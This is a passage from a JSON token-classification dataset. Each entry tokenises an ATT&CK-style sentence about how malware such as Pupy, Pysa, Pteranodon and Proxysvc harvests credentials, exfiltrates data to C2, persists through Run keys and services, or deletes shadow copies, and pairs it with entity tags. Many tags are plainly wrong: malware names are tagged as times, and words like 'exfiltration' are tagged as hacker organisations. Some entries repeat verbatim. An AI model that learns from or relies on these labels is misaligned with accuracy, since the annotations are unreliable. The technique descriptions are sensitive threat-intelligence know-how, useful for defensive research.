] }, { "tokens": [ "Proton", "gathers", "credentials", "in", "files", "for", "1password." ], "ner_tags": [ "B-Idus", "B-SamFile", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Proton", "captures", "the", "content", "of", "the", "desktop", "with", "the", "screencapture", "binary." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Proton", "modifies", "the", "tty_tickets", "line", "in", "the", "sudoers", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Proton", "uses", "macOS'", ".command", "file", "type", "to", "script", "actions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Proton", "uses", "VNC", "to", "connect", "into", "systems." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Proxysvc", "automatically", "collects", "data", "about", "the", "victim", "and", "sends", "it", "to", "the", "control", "server." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Proxysvc", "can", "overwrite", "files", "indicated", "by", "the", "attacker", "before", "deleting", "them." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Proxysvc", "searches", "the", "local", "system", "and", "gathers", "data." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "Proxysvc", "performs", "data", "exfiltration", "over", "the", "control", "server", "channel", "using", "a", "custom", "protocol." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "Proxysvc", "can", "delete", "files", "indicated", "by", "the", "attacker", "and", "remove", "itself", "from", "disk", "using", "a", "batch", "file." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Proxysvc", "lists", "files", "in", "directories." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Proxysvc", "lists", "processes", "running", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Proxysvc", "gathers", "product", "names", "from", "the", "Registry", "key:", "<code>HKLM\\Software\\Microsoft\\Windows", "NT\\CurrentVersion", "ProductName</code>", "and", "the", "processor", "description", "from", "the", "Registry", "key", "<code>HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", "ProcessorNameString</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Proxysvc", "registers", "itself", "as", "a", "service", "on", "the", "victim’s", "machine", "to", "run", "as", "a", "standalone", "process." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Proxysvc", "collects", "the", "OS", "version,", "country", "name,", "MAC", "address,", "computer", "name,", "physical", "memory", "statistics,", "and", "volume", "information", "for", "all", "drives", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Proxysvc", "collects", "the", "network", "adapter", "information", "and", "domain/username", "information", "based", "on", "current", "remote", "sessions." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "As", "part", "of", "the", "data", "reconnaissance", "phase,", "Proxysvc", "grabs", "the", "system", "time", "to", "send", "back", "to", "the", "control", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Proxysvc", "uses", "HTTP", "over", "SSL", "to", "communicate", "commands", "with", "the", "control", "server." ], "ner_tags": [ "B-Way", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Proxysvc", "executes", "a", "binary", "on", "the", "system", "and", "logs", "the", "results", "into", "a", "temp", "file", "by", "using:", "<code>cmd.exe", "/c", "\"<file_path>", ">", "%temp%\\PM*", ".tmp", "2>&1\"</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "PsExec", "has", "the", "ability", "to", "remotely", "create", "accounts", "on", "target", "systems." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "PsExec", "can", "be", "used", "to", "download", "or", "upload", "a", "file", "over", "a", "network", "share." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PsExec,", "a", "tool", "that", "has", "been", "used", "by", "adversaries,", "writes", "programs", "to", "the", "<code>ADMIN$</code>", "network", "share", "to", "execute", "commands", "on", "remote", "systems." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Microsoft", "Sysinternals", "PsExec", "is", "a", "popular", "administration", "tool", "that", "can", "be", "used", "to", "execute", "binaries", "on", "remote", "systems", "using", "a", "temporary", "Windows", "service." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "PsExec", "can", "leverage", "Windows", "services", "to", "escalate", "privileges", "from", "administrator", "to", "SYSTEM", "with", "the", "<code>-s</code>", "argument." ], "ner_tags": [ "B-Way", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Psylo", "exfiltrates", "data", "to", "its", "C2", "server", "over", "the", "same", "protocol", "as", "C2", "communications." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Psylo", "has", "commands", "to", "enumerate", "all", "storage", "devices", "and", "to", "find", "all", "files", "that", "start", "with", "a", "particular", "string." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Psylo", "has", "a", "command", "to", "download", "a", "file", "to", "the", "system", "from", "its", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Psylo", "has", "a", "command", "to", "conduct", "timestomping", "by", "setting", "a", "specified", "file’s", "timestamps", "to", "match", "those", "of", "a", "system", "file", "in", "the", "System32", "directory." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Psylo", "uses", "HTTPS", "for", "C2." ], "ner_tags": [ "B-Time", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Pteranodon", "can", "decrypt", "encrypted", "data", "strings", "prior", "to", "using", "them." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pteranodon", "can", "use", "a", "dynamic", "Windows", "hashing", "algorithm", "to", "map", "API", "components." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Pteranodon", "exfiltrates", "screenshot", "files", "to", "its", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pteranodon", "can", "delete", "files", "that", "may", "interfere", "with", "it", "executing.", "It", "also", "can", "delete", "temporary", "files", "and", "itself", "after", "the", "initial", "script", "executes." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pteranodon", "identifies", "files", "matching", "certain", "file", "extension", "and", "copies", "them", "to", "subdirectories", "it", "created." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pteranodon", "can", "download", "and", "execute", "additional", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Pteranodon", "creates", "various", "subdirectories", "under", "<code>%Temp%\\reports\\%</code>", "and", "copies", "files", "to", "those", "subdirectories.", "It", "also", "creates", "a", "folder", "at", "<code>C:\\Users\\<Username>\\AppData\\Roaming\\Microsoft\\store</code>", "to", "store", "screenshot", "JPEG", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pteranodon", "can", "use", "mshta.exe", "to", "execute", "an", "HTA", "file", "hosted", "on", "a", "remote", "server." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pteranodon", "has", "used", "various", "API", "calls." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pteranodon", "copies", "itself", "to", "the", "Startup", "folder", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pteranodon", "executes", "functions", "using", "rundll32.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Pteranodon", "schedules", "tasks", "to", "invoke", "its", "components", "in", "order", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pteranodon", "can", "capture", "screenshots", "at", "a", "configurable", "interval." ], "ner_tags": [ "B-Time", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Pteranodon", "has", "the", "ability", "to", "use", "anti-detection", "functions", "to", "identify", "sandbox", "environments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pteranodon", "can", "use", "a", "malicious", "VBS", "file", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Pteranodon", "can", "use", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Pteranodon", "can", "use", "`cmd.exe`", "for", "execution", "on", "victim", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pupy", "can", "compress", "data", "with", "Zip", "before", "sending", "it", "over", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pupy's", "default", "encryption", "for", "its", "C2", "communication", "channel", "is", "SSL,", "but", "it", "also", "has", "transport", "options", "for", "RSA", "and", "AES." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Pupy", "can", "record", "sound", "with", "the", "microphone." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Pupy", "can", "bypass", "Windows", "UAC", "through", "either", "DLL", "hijacking,", "eventvwr,", "or", "appPaths." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "B-Way", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Pupy", "can", "use", "Lazagne", "for", "harvesting", "credentials." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Pupy", "has", "a", "module", "to", "clear", "event", "logs", "with", "PowerShell." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Pupy", "can", "use", "Lazagne", "for", "harvesting", "credentials." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Pupy", "can", "use", "Lazagne", "for", "harvesting", "credentials." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Pupy", "can", "use", "Lazagne", "for", "harvesting", "credentials." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Pupy", "can", "user", "PowerView", "to", "execute", "“net", "user”", "commands", "and", "create", "domain", "accounts." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Pupy", "can", "migrate", "into", "another", "process", "using", "reflective", "DLL", "injection." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "I-Way", "O", "B-Way" ] }, { "tokens": [ "Pupy", "can", "send", "screenshots", "files,", "keylogger", "data,", "files,", "and", "recorded", "audio", "back", "to", "the", "C2", "server." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg", "O", "B-Features", "O", "B-Features", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Pupy", "can", "walk", "through", "directories", "and", "recursively", "search", "for", "strings", "in", "files." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Pupy", "can", "upload", "and", "download", "to/from", "a", "victim", "machine." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Pupy", "uses", "a", "keylogger", "to", "capture", "keystrokes", "it", "then", "sends", "back", "to", "the", "server", "after", "it", "is", "stopped." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pupy", "can", "sniff", "plaintext", "network", "credentials", "and", "use", "NBNS", "Spoofing", "to", "poison", "name", "services." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "I-Way", "I-Way", "O" ] }, { "tokens": [ "Pupy", "can", "use", "Lazagne", "for", "harvesting", "credentials." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Pupy", "can", "execute", "Lazagne", "as", "well", "as", "Mimikatz", "using", "PowerShell." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Pupy", "uses", "PowerView", "and", "Pywerview", "to", "perform", "discovery", "commands", "such", "as", "net", "user,", "net", "group,", "net", "local", "group,", "etc." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pupy", "can", "user", "PowerView", "to", "execute", "“net", "user”", "commands", "and", "create", "local", "system", "accounts." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Pupy", "can", "interact", "with", "a", "victim’s", "Outlook", "session", "and", "look", "through", "folders", "and", "emails." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Pupy", "has", "a", "built-in", "module", "for", "port", "scanning." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "Pupy", "can", "list", "local", "and", "remote", "shared", "drives", "and", "folders", "over", "SMB." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Pupy", "can", "also", "perform", "pass-the-ticket." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Pupy", "has", "a", "module", "for", "loading", "and", "executing", "PowerShell", "scripts." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Pupy", "can", "list", "the", "running", "processes", "and", "get", "the", "process", "ID", "and", "parent", "process’s", "ID." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Pupy", "can", "use", "an", "add", "on", "feature", "when", "creating", "payloads", "that", "allows", "you", "to", "create", "custom", "Python", "scripts", "(“scriptlets”)", "to", "perform", "tasks", "offline", "(without", "requiring", "a", "session)", "such", "as", "sandbox", "detection,", "adding", "persistence,", "etc." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O" ] }, { "tokens": [ "Pupy", "adds", "itself", "to", "the", "startup", "folder", "or", "adds", "itself", "to", "the", "Registry", "key", "<code>SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run</code>", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Pupy", "can", "enable/disable", "RDP", "connection", "and", "can", "start", "a", "remote", "desktop", "session", "using", "a", "browser", "web", "socket", "client." ], "ner_tags": [ "B-Way", "O", "B-Features", "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pupy", "can", "drop", "a", "mouse-logger", "that", "will", "take", "small", "screenshots", "around", "at", "each", "click", "and", "then", "send", "back", "to", "the", "server." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "B-Way", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pupy", "uses", "PsExec", "to", "execute", "a", "payload", "or", "commands", "on", "a", "remote", "host." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pupy", "has", "a", "module", "that", "checks", "a", "number", "of", "indicators", "on", "the", "system", "to", "determine", "if", "its", "running", "on", "a", "virtual", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pupy", "can", "grab", "a", "system’s", "information", "including", "the", "OS", "version,", "architecture,", "etc." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pupy", "has", "built", "in", "commands", "to", "identify", "a", "host’s", "IP", "address", "and", "find", "out", "other", "network", "configuration", "settings", "by", "viewing", "connected", "sessions." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pupy", "has", "a", "built-in", "utility", "command", "for", "<code>netstat</code>,", "can", "do", "net", "session", "through", "PowerView,", "and", "has", "an", "interactive", "shell", "which", "can", "be", "used", "to", "discover", "additional", "information." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Pupy", "can", "enumerate", "local", "information", "for", "Linux", "hosts", "and", "find", "currently", "logged", "on", "users", "for", "Windows", "hosts." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pupy", "can", "be", "used", "to", "establish", "persistence", "using", "a", "systemd", "service." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Way", "B-Tool" ] }, { "tokens": [ "Pupy", "can", "obtain", "a", "list", "of", "SIDs", "and", "provide", "the", "option", "for", "selecting", "process", "tokens", "to", "impersonate." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O" ] }, { "tokens": [ "Pupy", "can", "access", "a", "connected", "webcam", "and", "capture", "pictures." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Pupy", "can", "communicate", "over", "HTTP", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Pupy", "can", "use", "an", "XDG", "Autostart", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "PyDCrypt", "has", "decrypted", "and", "dropped", "the", "DCSrv", "payload", "to", "disk." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "PyDCrypt", "has", "modified", "firewall", "rules", "to", "allow", "incoming", "SMB,", "NetBIOS,", "and", "RPC", "connections", "using", "`netsh.exe`", "on", "remote", "machines." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "PyDCrypt", "has", "been", "compiled", "and", "encrypted", "with", "PyInstaller,", "specifically", "using", "the", "--key", "flag", "during", "the", "build", "phase." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PyDCrypt", "will", "remove", "all", "created", "artifacts", "such", "as", "dropped", "executables." ], "ner_tags": [ "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "PyDCrypt", "has", "dropped", "DCSrv", "under", "the", "`svchost.exe`", "name", "to", "disk." ], "ner_tags": [ "B-Org", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "PyDCrypt", "has", "attempted", "to", "execute", "with", "PowerShell." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "PyDCrypt,", "along", "with", "its", "functions,", "is", "written", "in", "Python." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PyDCrypt", "has", "used", "netsh", "to", "find", "RPC", "connections", "on", "remote", "machines." ], "ner_tags": [ "O", "O", "O", "B-Tool", "O", "I-Features", "B-Purp", "B-Features", "O", "O", "O" ] }, { "tokens": [ "PyDCrypt", "has", "probed", "victim", "machines", "with", "<code>whoami</code>", "and", "has", "collected", "the", "username", "from", "the", "machine." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PyDCrypt", "has", "used", "`cmd.exe`", "for", "execution." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "PyDCrypt", "has", "attempted", "to", "execute", "with", "WMIC." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "Pysa", "has", "used", "brute", "force", "attempts", "against", "a", "central", "management", "console,", "as", "well", "as", "some", "Active", "Directory", "accounts." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pysa", "has", "extracted", "credentials", "from", "the", "password", "database", "before", "encrypting", "the", "files." ], "ner_tags": [ "B-Time", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pysa", "has", "used", "RSA", "and", "AES-CBC", "encryption", "algorithm", "to", "encrypt", "a", "list", "of", "targeted", "file", "extensions." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Pysa", "has", "the", "capability", "to", "stop", "antivirus", "services", "and", "disable", "Windows", "Defender." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "B-SecTeam" ] }, { "tokens": [ "Pysa", "has", "deleted", "batch", "files", "after", "execution." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Features", "O", "O" ] }, { "tokens": [ "Pysa", "has", "the", "functionality", "to", "delete", "shadow", "copies." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "Pysa", "can", "perform", "OS", "credential", "dumping", "using", "Mimikatz." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Pysa", "has", "executed", "a", "malicious", "executable", "by", "naming", "it", "svchost.exe." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Pysa", "has", "modified", "the", "registry", "key", "“SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System”", "and", "added", "the", "ransom", "note." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pysa", "can", "perform", "network", "reconnaissance", "using", "the", "Advanced", "Port", "Scanner", "tool." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "Pysa", "has", "used", "Powershell", "scripts", "to", "deploy", "its", "ransomware." ], "ner_tags": [ "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Pysa", "has", "used", "Python", "scripts", "to", "deploy", "ransomware." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Org" ] }, { "tokens": [ "Pysa", "has", "laterally", "moved", "using", "RDP", "connections." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Pysa", "has", "used", "PsExec", "to", "copy", "and", "execute", "the", "ransomware." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pysa", "can", "stop", "services", "and", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Pysa", "can", "perform", "network", "reconnaissance", "using", "the", "Advanced", "IP", "Scanner", "tool." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "QUADAGENT", "was", "likely", "obfuscated", "using", "`Invoke-Obfuscation`." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "QUADAGENT", "uses", "DNS", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "QUADAGENT", "uses", "AES", "and", "a", "preshared", "key", "to", "decrypt", "the", "custom", "Base64", "routine", "used", "to", "encode", "strings", "and", "scripts." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QUADAGENT", "uses", "multiple", "protocols", "(HTTPS,", "HTTP,", "DNS)", "for", "its", "C2", "server", "as", "fallback", "channels", "if", "communication", "with", "one", "is", "unsuccessful." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QUADAGENT", "has", "a", "command", "to", "delete", "its", "Registry", "key", "and", "scheduled", "task." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "QUADAGENT", "stores", "a", "session", "identifier", "unique", "to", "the", "compromised", "system", "as", "well", "as", "a", "pre-shared", "key", "used", "for", "encrypting", "and", "decrypting", "C2", "communications", "within", "a", "Registry", "key", "(such", "as", "`HKCU\\Office365DCOMCheck`)", "in", "the", "`HKCU`", "hive." ], "ner_tags": [ 